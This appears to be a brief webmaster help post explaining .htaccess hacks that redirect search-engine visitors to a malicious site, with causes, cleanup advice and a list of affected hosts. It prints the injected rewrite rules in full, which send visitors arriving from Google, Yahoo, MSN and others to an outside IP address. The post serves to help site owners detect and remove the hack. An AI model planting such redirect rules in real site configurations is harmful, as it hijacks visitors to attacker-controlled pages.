HtAccess Hacks – Redirects to Malicious Site

The reason this type of hack occurs:
This can happen for various reasons like:

– poor/compromised account/FTP password, which allows hackers to guess the password [or use brutforce tools] and get unauthorized access.
– user’s computer infected by viruses, which is controlled by hackers. In this situation, customer’s uploads also get infected.
– poor scripts, which allows hackers to insert various malformed queries and remotely execute the code and perform intended action
– Virus effected theme selection for the application
– Installing application which are downloaded form third party sites; mainly not genuine sites.

You will have to ensure that:

– generate a strong password combination [for account, ftp, database etc]
– scan local computer with good antivirus, anti spy ware programs and clean bad programs.
– keep the software up-to-date with vendors/developers, and seek their support/forums for any known vulnerabilities/fixes/workarounds available.

Host dealing with this issue:
hostmonster
ipower
unknown/
unknown2
ipower2
ixwebhosting

information on having your page delisted from Google as a malicious site.

Another site that will help you get de-listed from Google.

What the Code looks Like in the Htaccess File:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*oogle.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ahoo.*$ [NC]
RewriteRule .* http://89.28.13.200/join.html?s=join [R,L]

Other Good Links on this Type of Hack:
#1
#2

Leave a Reply

Your email address will not be published. Required fields are marked *